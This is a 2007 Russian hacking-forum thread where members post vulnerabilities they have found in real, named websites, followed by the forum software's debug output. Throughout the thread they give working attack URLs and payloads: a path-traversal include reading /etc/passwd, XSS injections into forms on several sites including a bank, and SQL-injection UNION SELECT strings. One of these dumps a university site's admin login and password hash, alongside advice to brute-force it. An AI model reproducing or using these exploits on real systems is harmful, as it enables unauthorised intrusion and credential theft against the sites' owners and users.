Уязвимости найденные вами скачать бесплатно программу фильм mp3 русификатор

Здравствуйте Гость ( Вход | Регистрация )

Твой софтовый форум > Тематические форумы > Хак! Ломать не строить - это уметь надо

Уязвимости найденные вами

Каскадный · Стандартный · [ Линейный ]

Уязвимости найденные вами, sql-inj, php-incl, xss...

Подписка на тему | Сообщить другу | Версия для печати

13.06.2007 - 21:25 Отправлено #1
*de1ay* Cardable Unit [SoftoRooMTeaM] Профиль Группа: СуперМодераторы Сообщений: 3.842 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010 Респектов: 610	Начну я. Инклюд для начала. QUOTE http://ai.isi.edu/index.php?module=seminars/index&submodule=../../../../../etc/passwd

2 Страницы 1 2 >

Ответов(1 - 9)

16.06.2007 - 9:30

Отправлено #2

zombie18

Опытный юзверь

Профиль
Группа: Пользователи
Сообщений: 70
Регистрация: 11.02.2006
Пользователь №: 119.671

Респектов: 20
-----X----

Предупреждений: 0

ну вот xss докучи...

QUOTE

http://www.transtech.ru/Anketa/anketa1.htm

в поле Ф.И.О. вписываем

CODE

"><script>alert(/xss/)</script>

QUOTE

http://www.regent.ru/about/graduates.html

помоему в любое поле вообще... такую же байду:

CODE

"><script>alert(/xss/)</script>

QUOTE

http://www.vms.ru/pages/atketa.php

тоже куда хошь... ниче не фильтруется...

CODE

"><script>alert(/xss/)</script>

QUOTE

http://www.osp.ru/

в поиске пишем:

CODE

"><script>alert(/xss/)</script>

+1
вот тебе и юниаструм банк (^_~)

QUOTE

http://www.uniastrum.ru/ru/ml_form/

в поле Фамилия, Имя, Отчество: тот же баг у всех на ">

CODE

"><body onLoad=alert('xss')>

QUOTE

http://intv.ru/

при регистрации поле "ник" не фильтруется, можно написаль там к примеру:

CODE

"><script>alert('xss')</script>

чтобы посмотреть пример залогиньтесь с

| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |

QUOTE

http://www.klerk.ru/subscribe/register.php

уязвимо поле e-mail. пример использования:

CODE

http://www.klerk.ru/subscribe/register.php?email=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E

Сообщение отредактировал zombie18 - 16.06.2007 - 13:51

29.07.2007 - 21:18

Отправлено #3

de1ay

Cardable Unit
[SoftoRooMTeaM] Group Icon

Профиль
Группа: СуперМодераторы
Сообщений: 3.842
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010

Респектов: 610
-----XXXX-

| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |

7.08.2007 - 18:33

Отправлено #4

de1ay

Cardable Unit
[SoftoRooMTeaM] Group Icon

LZA Terminologijas komisija
Один из местных универов.

| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |

21.08.2007 - 18:17

Отправлено #5

de1ay

Cardable Unit
[SoftoRooMTeaM] Group Icon

Big6: Information Skills for Student Achievement

| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |

21.08.2007 - 20:37 Отправлено #6
*ZaHack* Большой Брат [SoftoRooMTeaM] Профиль Группа: Модераторы Сообщений: 1.104 Регистрация: 24.01.2006 Из: Where The Eagles Fly Пользователь №: 333 Респектов: 111	Не совсем по теме (тут больше веб-уязвимости), но все же: Переполнение буфера обмена программы helpctr.exe Уязвимые ОС: Win XP При вводе в IE строки: Code hcp://w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w. происходит запуск самой программы helpctr.exe Это происходит из-за возникновения в приложении исключения (которое вызывается удаленно из браузера) PS Практического применения эта уязвимость, конечно, не имеет, но наглядно показывает "надежность" продуктов от M$ PPS Работает не на всех компьютерах.

21.08.2007 - 23:10 Отправлено #7
*de1ay* Cardable Unit [SoftoRooMTeaM] Профиль Группа: СуперМодераторы Сообщений: 3.842 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010 Респектов: 610	Цитата \| Quote(ZaHack @ 21.08.2007 - 20:34) PS Практического применения эта уязвимость, конечно, не имеет, но наглядно показывает "надежность" продуктов от M$ А почему нет? Переполненяем буфер, передаём управление шелл-коду... Все.

28.08.2007 - 19:03 Отправлено #8
*de1ay* Cardable Unit [SoftoRooMTeaM] Профиль Группа: СуперМодераторы Сообщений: 3.842 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010 Респектов: 610	Code http://www.varmint.org/ishop/index.php?GID=-1+union+select+1,2,version(),4,5,6,7,8,9,1,2/* Таблицы лень подбирать...

28.08.2007 - 19:17 Отправлено #9
*de1ay* Cardable Unit [SoftoRooMTeaM] Профиль Группа: СуперМодераторы Сообщений: 3.842 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010 Респектов: 610	ГОРОДСКОЙ ЭЛЕКТРОТРАНСПОРТ совмещённый трамвайно-троллейбусный сайт Code http://stts.mosfont.ru/articles.php?gid=-1+union+select+1,table_name+from+information_schema.tables+limit+0,1/*

28.08.2007 - 20:09 Отправлено #10
*de1ay* Cardable Unit [SoftoRooMTeaM] Профиль Группа: СуперМодераторы Сообщений: 3.842 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010 Респектов: 610	www.crim.ncsu.edu Center for Robotics and Intelligent Machines Достаем логин и хеш: Code http://www.crim.ncsu.edu/project_detailed.php?id=-1+union+select+1,2,3,concat(user_login,0x3a,user_pass),5,6,7,8,9,1,2,3,4,5,6,7,8+from+wp_users+limit+0,1/* admin:75bb40f591c0db371aba50f65741d73f Можно сбрутить... Логинимся тут: http://www.crim.ncsu.edu/login.php Статическая инфа: Версия: 5.0.19-max-log Пользователь: wp_crim@engr06ws.eos.ncsu.edu База: wp_crim

2 Страницы 1 2 >

Hide Debug Information

Debug Information

FORM and GET Input

showtopic = 32437
st = 0
request_method = get
_low_act =
act = st
t = 32437
f = 45
IP_ADDRESS = 38.103.63.17
last_activity = 1215576459
last_visit = 1215576459
skinid = 0
selectedpids =
selectedpidcount = 0

SKIN & TASK Info

_css = html { overflow-x: auto; } body { background: #F5F5F5 url(style_images/<#IMG_DIR#>/back.gif); color: #10264E...
_wrapper = <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"...
_macro = a:111:{s:7:"a_apoll";a:6:{s:8:"macro_id";s:3:"218";s:11:"macro_value";s:7:"A_APOLL";s:13:"macro_replace";s:79:"<img src=...
_skincacheid = 7
_csscacheid = 7
_imagedir = 1
_emodir = default
_setid = 7
_setname = Vizion Pro x (Импорт)
_usecsscache = 0
Next task = Сегодня, 7:17
Time now = Сегодня, 7:10
Timestamp Now = 1215576459

Loaded PHP Templates

skin_global, skin_topic

Queries Used

SET CHARACTER SET cp1251

SELECT * FROM ibf_topics WHERE tid=32437

SELECT * FROM ibf_cache_store WHERE cs_key IN ( 'attachtypes','bbcode', 'multimod','ranks','profilefields','reputation_ranks','calendar','birthdays','banfilters', 'portal_cache', 'bbcode', 'settings', 'group_cache', 'systemvars', 'skin_id_cache', 'forum_cache', 'moderators', 'stats', 'languages' )

DELETE FROM ibf_sessions WHERE ip_address='38.103.63.17'

SELECT * FROM ibf_skin_sets WHERE set_skin_set_id=7

SELECT pid FROM ibf_posts WHERE topic_id=32437 and queued=0 ORDER BY pid LIMIT 0,10

SELECT p.*, m.id,m.name,m.mgroup,m.email,m.joined,m.posts, m.last_visit, m.last_activity,m.login_anonymous,m.title,m.hide_email, m.warn_level, m.warn_lastwarn, m.job, m.rep, m.rep_all, m.allow_anon, m.allow_rep, me.msnname,me.aim_name,me.icq_number,me.signature, me.website,me.yahoo,me.location, me.avatar_location, me.avatar_type, me.avatar_size FROM ibf_posts p LEFT JOIN ibf_members m ON (p.author_id=m.id) LEFT JOIN ibf_member_extra me ON (me.id=m.id) WHERE p.pid IN(188159,188849,198505,200255,203290,203324,203353,204821,204825,204832) ORDER BY pid asc

SHUTDOWN: INSERT INTO ibf_sessions (id,member_name,member_id,member_group,in_forum,in_topic,login_type,running_time,location,ip_address,browser,in_error) VALUES('aefebdecc9199842ae0a34fe47120979','',0,2,45,32437,0,1215576459,'st,,','38.103.63.17','CCBot/1.0 (+http://www.commoncrawl.org/bot.html)',0)

SHUTDOWN: UPDATE LOW_PRIORITY ibf_topics SET views=views+1 WHERE tid=32437